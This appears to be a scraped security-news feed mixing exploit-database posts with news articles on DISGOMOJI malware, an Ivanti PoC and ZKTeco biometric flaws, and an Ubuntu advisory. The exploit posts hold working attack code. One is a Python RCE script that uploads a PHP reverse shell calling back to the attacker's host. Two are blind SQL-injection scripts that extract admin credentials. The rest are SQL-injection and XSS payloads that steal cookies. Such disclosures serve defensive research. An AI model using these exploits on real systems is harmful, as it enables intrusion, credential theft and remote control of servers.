Payroll Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:"Employee's Payroll Management System"# Date: 16/06/2024# Exploit Author: ShellUnease# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833#!/usr/bin/pythonimport argparseimport timeimport requestsclass Exploit:    def __init__(self, rhost, rport, lhost, lport, https):        self.rhost = rhost        self.rport = rport        self.lhost = lhost        self.lport = lport        self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'        self.banner()    def banner(self):        print("""  _____                      _ _                                |  __ \                    | | |                               | |__) |_ _ _   _ _ __ ___ | | |                               |  ___/ _` | | | | '__/ _ \| | |                               | |  | (_| | |_| | | | (_) | | |                               |_|  _\__,_|\__, |_|  \___/|_|_|                          _    |  \/  |     __/ |                                       | |   | \  / | __ |___/_   __ _  __ _  ___ _ __ ___   ___ _ __ | |_  | |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __| | |  | | (_| | | | | (_| | (_| |  __/ | | | | |  __/ | | | |_  |_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|  / ____|         | |       __/ |     |  __ \ / ____|  ____|    | (___  _   _ ___| |_ ___ |___/___   | |__) | |    | |__        \___ \| | | / __| __/ _ \ '_ ` _ \  |  _  /| |    |  __|       ____) | |_| \__ \ ||  __/ | | | | | | | \ \| |____| |____     |_____/ \__, |___/\__\___|_| |_| |_| |_|  \_\\_____|______|             __/ |                                                         |___/                                                          """)    def get_data(self):        return {            'name': 'John Doe',            'email': 'jdoe@gmail.com',            'contact': 'John Doe',            'about': 'John Doe',        }    def get_payload(self):        return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, '                f'2=>$sock),$pipes); ?>')    def upload_rev_shell(self):        url = f'{self.targetUrl}/ajax.php?action=save_settings'        print(f'Uploading a reverse shell via {url}')        requests.post(url, files={'img': ('a.php', self.get_payload())},                      data=self.get_data())        epoch = time.time()        timestamp = epoch - (epoch % 60)        timestamp_minus_one_min = timestamp - 60        timestamp_plus_one_min = timestamp + 60        return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',                f'{int(timestamp_plus_one_min)}_a.php']    def open_rev_shell(self, candidates):        print('Opening a reverse shell')        for candidate in candidates:            url = f'{self.targetUrl}/assets/img/{candidate}'            try:                requests.get(url).raise_for_status()                print(f'Got a success response for {url}, you should have a revshell')                return            except Exception as e:                print(f'Failed to open revshell using {url}')        print('Guessing filename failed')    def exploit(self):        candidates = self.upload_rev_shell()        self.open_rev_shell(candidates)def get_args():    parser = argparse.ArgumentParser(        description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')    parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')    parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',                        default=80)    parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')    parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')    parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')    args = parser.parse_args()    return argsif __name__ == '__main__':    args = get_args()    exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)    exp.exploit()

Payroll Management System 1.0 Remote Code Execution

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.
Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.
"It is a modified version of the public project

Cyber Espionage / Malware

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.

Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.

"It is a modified version of the public project Discord-C2, which uses the messaging service Discord for command and control (C2), making use of emojis for its C2 communication," it said.

It's worth noting that DISGOMOJI is the same "all-in-one" espionage tool that BlackBerry said it discovered as part of an infrastructure analysis in connection with an attack campaign mounted by the Transparent Tribe actor, a Pakistan-nexus hacking crew

The attack chains commence with spear-phishing emails bearing a Golang ELF binary delivered within a ZIP archive file. The binary then downloads a benign lure document while also stealthily downloading the DISGOMOJI payload from a remote server.

A custom-fork of Discord-C2, DISGOMOJI is designed to capture host information and run commands received from an attacker-controlled Discord server. In an interesting twist, the commands are sent in the form of different emojis -

*   🏃‍♂️ - Execute a command on the victim's device
*   📸 - Capture a screenshot of the victim's screen
*   👇 - Upload a file from the victim's device to the channel
*   👈 - Upload a file from the victim's device to transfer\[.\]sh
*   ☝️ - Download a file to the victim's device
*   👉 - Download a file hosted on oshi\[.\]at to the victim's device
*   🔥 - Find and exfiltrate files matching the following extensions: CSV, DOC, ISO, JPG, ODP, ODS, ODT, PDF, PPT, RAR, SQL, TAR, XLS, and ZIP
*   🦊 - Gather all Mozilla Firefox profiles on the victim's device into a ZIP archive
*   💀 - Terminate the malware process on the victim's device

"The malware creates a dedicated channel for itself in the Discord server, meaning each channel in the server represents an individual victim," Volexity said. "The attacker can then interact with every victim individually using these channels."

The company said it unearthed different variations of DISGOMOJI with capabilities to establish persistence, prevent duplicate DISGOMOJI processes from running at the same time, dynamically fetch the credentials to connect to the Discord server at runtime rather than hard coding them, and deter analysis by displaying bogus informational and error messages.

UTA0137 has also been observed using legitimate and open-source tools like Nmap, Chisel, and Ligolo for network scanning and tunneling purposes, respectively, with one recent campaign also exploiting the DirtyPipe flaw (CVE-2022-0847) to achieve privilege escalation against Linux hosts.

Another post-exploitation tactic concerns the use of the Zenity utility to display a malicious dialog box that masquerades as a Firefox update in order to socially engineer users into giving up their passwords.

"The attacker successfully managed to infect a number of victims with their Golang malware, DISGOMOJI," Volexity said. "UTA0137 has improved DISGOMOJI over time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6832-1June 13, 2024virtuoso-opensource vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Open-Source Edition could be made to crash if it received specially craftedinput.Software Description:- virtuoso-opensource: high-performance databaseDetails:Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.(CVE-2023-31607, CVE-2023-31608, CVE-2023-31609, CVE-2023-31610,CVE-2023-31611, CVE-2023-31616, CVE-2023-31617, CVE-2023-31618,CVE-2023-31619, CVE-2023-31623, CVE-2023-31625, CVE-2023-31628)Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu24.04 LTS. (CVE-2023-31612, CVE-2023-31613, CVE-2023-31614,CVE-2023-31615)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 23.10   virtuoso-opensource             7.2.5.1+dfsg1-0.3ubuntu1.1   virtuoso-opensource-7           7.2.5.1+dfsg1-0.3ubuntu1.1   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.3ubuntu1.1Ubuntu 22.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 20.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu ProUbuntu 18.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu ProUbuntu 16.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6832-1   CVE-2023-31607, CVE-2023-31608, CVE-2023-31609, CVE-2023-31610,   CVE-2023-31611, CVE-2023-31612, CVE-2023-31613, CVE-2023-31614,   CVE-2023-31615, CVE-2023-31616, CVE-2023-31617, CVE-2023-31618,   CVE-2023-31619, CVE-2023-31623, CVE-2023-31625, CVE-2023-31628Package Information:   https://launchpad.net/ubuntu/+source/virtuoso-opensource/7.2.5.1+dfsg1-0.3ubuntu1.1

Ubuntu Security Notice USN-6832-1

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

A new month, a new high-risk Ivanti bug for attackers to exploit — this time, an SQL injection issue in its centralized endpoint manager.

Source: Phichak via Alamy Stock Photo

Researchers have developed a proof-of-concept (PoC) exploit for a critical vulnerability in Ivanti Endpoint Manager that was recently disclosed — potentially setting the stage for mass exploitation of the devices.

CVE-2024-29824, an SQL injection bug, was first discovered by an independent researcher and sold to Trend Micro's Zero Day Initiative (ZDI). ZDI informed Ivanti of the issue on April 3.

It affects the company's centralized endpoint management solution, an attractive target for any hacker interested in compromising many devices across an organization from one launch point. The issue allows unauthenticated attackers to perform remote code execution (RCE) in the program, earning it a critical 9.8 out of 10 CVSS score.

"Endpoint Manager is usually elevated, so this really allows you to take over an Ivanti system," says Dustin Childs, head of threat awareness at ZDI. "From there, they would be able to affect other systems and do whatever you're using the Endpoint Manager to do."

The specific flaw lay in "RecordGoodApp," a method within a dynamic link library (DLL) file called "PatchBiz," contained within the program's core server. As outlined in a new blog post from Horizon3.ai, which published the PoC on GitHub, an attacker can take advantage of RecordGoodApp's very first string, which does not sufficiently validate user input data before constructing SQL queries. They demonstrated as much by sending a "fairly trivial" request to an endpoint handling events, convincing it to run Windows Notepad.

**Ivanti's Response**

Few organizations in cybersecurity history have been taken to task like Ivanti this year. Initially there were a couple of zero-day vulnerabilities, then another, then a whole lot more. Patches rolled in slowly and exploits skyrocketed, including some especially high-profile cases. Then, just as the bad press was finally starting to die down, this latest vulnerability arrived, equal in posing risk to corporations as any that had come before.

The good news: Childs emphasizes that, despite Ivanti's recent troubles, it handled this latest vulnerability by the book.

"It's not like we had to convince them \[to patch\]. We reported it to them, and they immediately got on it. They produced a patch within six weeks. That's about as good as you're going to see," he says. "So yes, they've had a lot of security problems this year, but they have made tremendous strides in addressing those problems in a very timely manner."

Ivanti published a patch for CVE-2024-29824 alongside its disclosure on May 24. Customers who haven't yet would be well advised to implement it as soon as possible, since threat actors have a history of piling on Ivanti vulnerabilities anyway, and an available, working PoC will likely spur them on further.

Besides patching, organizations can also focus on keeping their management interfaces protected from the wider Web. "Make sure that if your Endpoint Manager is Internet accessible, you restrict it to some very specific IP addresses that are \[trusted\]," Childs says.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

PoC Exploit Emerges for Critical RCE Bug in Ivanti Endpoint Manager

Lost and Found Information System version 1.0 suffers from a reflective cross site scripting vulnerability.

    # Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users# CVE : CVE-2024-378591) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>

Lost And Found Information System 1.0 Cross Site Scripting

Lost and Found Information System version 1.0 suffers from an unauthenticated blind boolean-based remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37857import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload):    params = {"page": "categories/view_category", "id": payload}    response = r.get(rhost+admin_path, params=params)    if "Category ID is not valid" not in response.text:        return True    else:        return False    def sqli(rhost, column):    charset = string.printable    output_length = 200    output = ""    for i in range(output_length):        for char in charset:            # Extracts the credentials of user with id=1, admin by default            payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1))            sys.stdout.write(f"\r[*] Extracting: {output}\r")            if char_extract(rhost, payload):                output += char                break            elif char == '~' and not char_extract(rhost, payload):                print("[*] Extracting:",output)                return outputdef argsetup():    about  = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'    parser = argparse.ArgumentParser(description=about)    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)    args = parser.parse_args()    return argsdef main():    args   = argsetup()    rhost = args.target    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__":    main()

Lost And Found Information System 1.0 SQL Injection

Lost and Found Information System version 1.0 suffers from an unauthenticated blind time-based remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37858import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload):    params = {"page": "categories/manage_category", "id": payload}    response = r.get(rhost+admin_path, params=params)    if response.elapsed.total_seconds() > 1:        return True    else:        return False    def sqli(rhost, column):    charset = string.printable    output_length = 200    output = ""    for i in range(output_length):        for char in charset:            # Extracts the credentials of user with id=1, admin by default            payload = "13371337' or if((char(%s)=(select substring(%s,%s,1) from users where id=1)),sleep(1),1)-- -" % (ord(str(char)),str(column),str(i+1))            sys.stdout.write(f"\r[*] Extracting: {output}\r")            if char_extract(rhost, payload):                output += char                break            elif char == '~' and not char_extract(rhost, payload):                print("[*] Extracting:",output)                return outputdef argsetup():    about  = 'Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'    parser = argparse.ArgumentParser(description=about)    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)    args = parser.parse_args()    return argsdef main():    args   = argsetup()    rhost = args.target    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__":    main()

Lost and Found Information System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross Site Scripting Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from a Stored Cross Site Scripting Vulnerability allowing authenticated attackers to execute javascript in context of other users including the admin# CVE : CVE-2024-378561) Go to the User Profile page2) Paste the XSS payload '<script>alert(document.cookie)</script>' in either of the first, last, middle name fields3) The payload will be triggered in the context of the admin or the other users# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System

Face scans stored like passwords inevitably will be compromised, like passwords are. But there's a crucial difference between the two that organizations can rely on when their manufacturers fail.

Source: Zoonar GmbH via Alamy Stock Photo

Two dozen vulnerabilities in a biometric terminal used in critical facilities worldwide could allow hackers to gain unauthorized access, manipulate the device, deploy malware, and steal biometric data. And yet, exactly how damaging this could be for organizations is up for debate.

Biometric security is more popular today than ever, with widespread adoption in the public sector — law enforcement, national ID systems, etc. — as well as for commercial industries like travel and personal computing. In Japan, subway riders can "pay by face," and Singapore's immigration system relies on face scans and thumbprints to allow travelers into the country. The fact that even burger places are experimenting with face scans suggests something's brewing here.

In short order, though, hackers have found their way around and, sometimes, inside of these purportedly secure systems.

Recently, a Kaspersky researcher tore open terminals sold by the Chinese manufacturer ZKTeco. These white-label devices are used to guard corporate and critical premises worldwide, using face scans and QR codes. The research ended up yielding a couple of dozen garden-variety bugs, split into a number of categories, such as SQL injections, improper verifications of user input, and the like.

The risks to physical security are significant, but experts point out that a biometric data leak isn't necessarily as severe as a leak of other forms of personal data. Anyone worried about their face being stolen need not cry foul.

**Vulnerabilities in Biometric Terminals**

Exploiting a ZKTeco terminal could look like any other cyberattack, or it could involve rather inventive physical compromises.

On that first end of the spectrum are bugs like CVE-2023-3940 and CVE-2023-3942 — a path traversal and SQL injection flaw, respectively — which allow for viewing and extracting files, including users' biometric data and password hashes. Then there are CVE-2023-3939 and CVE-2023-3943, which allow for privileged command execution.

"It was quite astonishing to find a substantial number of SQL-injection vulnerabilities in the binary protocol used for transmitting control commands to the device," Georgy Kiguradze, senior application security specialist at Kaspersky, says. "Also, similar vulnerabilities were discovered in the QR code reader embedded within the device’s camera — a location where one would not typically expect to find such a vulnerability, as it is generally associated with remote attacks."

He's referring to CVE-2023-3938, where an attacker injects malicious data into a QR code to perform a SQL injection. When the terminal reads the code, it mistakes it as belonging to the most recently authorized legitimate user. In practice, then, an on-site attacker could trick a terminal into allowing them access to an otherwise restricted area. A modified version of this exploit with extra malicious data could also cause overflows and trigger a machine restart.

Kiguradze also found a means of physical attack via facial recognition. With a bug like CVE-2023-3941 — an issue with verification of user input — an intruder can access and remotely alter the machine's biometric database. At that point, they could upload their own face to the system alongside legitimate entries.

It's unclear yet whether ZKTeco has patched any of these vulnerabilities. Dark Reading has reached out to the manufacturer for more information.

**Securing Biometric Systems**

Biometrics generally are regarded as a step above typical authentication mechanisms — that extra James Bond-level of security necessary for the most sensitive devices and the most serious environments.

ZKTeco terminals, for example, are deployed around the globe at nuclear and chemical plants, hospitals, and the like. They guard server rooms, executive suites, and sensitive equipment. Vulnerabilities such as those described above might be ill-fitted for financially motivated cybercriminals, but devilishly useful to an insider or advanced nation-state threat actor intent on stealing data or even manipulating safety-critical processes.

The critical nature of the environments in which these systems are so often deployed necessitates that organizations go above and beyond to ensure their integrity. And that job takes much more than just patching newly discovered vulnerabilities.

"First, isolate a biometric reader on a separate network segment to limit potential attack vectors," Kiguradze recommends. Then, "implement robust administrator passwords and replace any default credentials. In general, it is advisable to conduct thorough audits of the device’s security settings and change any default configurations, as they are usually easier to exploit in a cyberattack."

"There have been recent security breaches — you've probably read about them," acknowledges Rohan Ramesh, director of product marketing at Entrust. But in general, he says, there are ways to protect databases with hardware security modules and other advanced encryption technologies.

Alternatively, organizations unsure about biometrics could focus on scaling them back where possible, or ensuring that they aren't the only protection in place. The trick is making sure those additional safeguards are invisible to the user, given that part of the appeal of biometrics is its frictionlessness.

"If I want to reset my multifactor authentication (MFA), or add a user to the system — if I want to change a server that hosts personally identifiable information (PII) or other critical data, or if I'm doing a banking transaction — I should need to go through extra verification through biometrics. You want biometrics to be a seamless option for certain situations," Ramesh says.

**The Big, Fat Silver Lining**

The bottom-line question for security teams is: Are biometrics materially safer than other forms of authentication if, in the end, the data is stored and protected the same way?

Well, yes, mostly, experts say.

"I want to address a common misconception," says iProov founder and CEO Andrew Bud, "which is that somehow a biometric is like a password and, therefore, like a password, if it were stolen or compromised, then it would become worthless. That is a fundamental conceptual error, because a biometric — like a face — is not a secret."

He explains, "A password is good because it's secret. But a face is not a secret in the modern world. It's enough to look on LinkedIn or Facebook to grab people's faces. What makes a face or any other kind of biometric so very valuable is not that it's confidential, but that the genuine article is unique. You can steal my password, but you cannot steal my face."

In practice, then, leaked photographs, fingerprints, or iris scans from a biometric scanner aren't the end of the world. One might instinctively cringe at the notion of a hacker holding a photograph of them, but facsimiles of the real thing shouldn't fool cutting-edge recognition technologies today. ZKTeco terminals have a temperature detection mechanism, for instance, that verifies personhood, preventing intruders from using, say, printed photographs to fool a facial-recognition terminal.

Alternatively, "You can do a bio-to-bio permutation," Ramesh suggests. "If I take a picture of you in May 2024, in May 2025, based on AI-based calculations and predictions, we could predict how you could \[physically\] change."

Or, Bud says, "When you check a person's face, you can introduce something unpredictable into the scene which causes the face to react in ways that are unique compared to a deepfake or copy."

He adds, "What we do is use the screen of the user's device to flash an unpredictable and unique sequence of colors that illuminates the user's face, and we stream video of the face back to our servers. The way that light reflects off a human's face, and the way that reflection interacts with the ambient light … that's a very, very, very peculiar, unusual, and unpredictable challenge, which is extremely difficult to forge."

If the facial recognition mechanism is robust to copies, he explains, "In principle, you don't have to rely upon the security of the device that it's collected on. In fact, we start out with the assumption that the device cannot be trusted at all."

Unfortunately, there is one caveat. Unlike with physical features like faces, eyes, and fingerprints, "It's extremely hard, if not impossible, to detect a deepfake voice," Bud says. "There is so little information in voiceprints that there aren't many signals of fakeness to find" — so, advanced versions of biometrics are the way to go.

Tag

#sql